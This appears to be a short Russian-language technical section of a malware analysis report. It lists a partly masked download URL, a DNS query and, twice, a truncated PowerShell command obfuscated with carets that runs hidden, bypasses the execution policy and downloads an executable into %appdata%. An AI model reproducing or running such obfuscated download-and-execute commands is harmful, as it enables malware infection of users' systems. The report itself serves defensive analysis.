Техническая информация
- http://do###oop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwe^rshElL.^e^xE^ -^e^xec^u^tIO^n^pOLi^CY ^b^Y^P^asS^ -NOPr^oFIle ^-wi^nDO^W^Styl^e h^IdDeN (^n^Ew-oBJe^ct^ sy^StE^m.nE^t^.^WE^BC^l^iE^nT)^.Down^Loa^Dfile^('http://do###oop.to...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "pOwe^rshElL.^e^xE^ -^e^xec^u^tIO^n^pOLi^CY ^b^Y^P^asS^ -NOPr^oFIle ^-wi^nDO^W^Styl^e h^IdDeN (^n^Ew-oBJe^ct^ sy^StE^m.nE^t^.^WE^BC^l^iE^nT)^.Down^Loa^Dfile^('http://do###oop.to...' (со скрытым окном)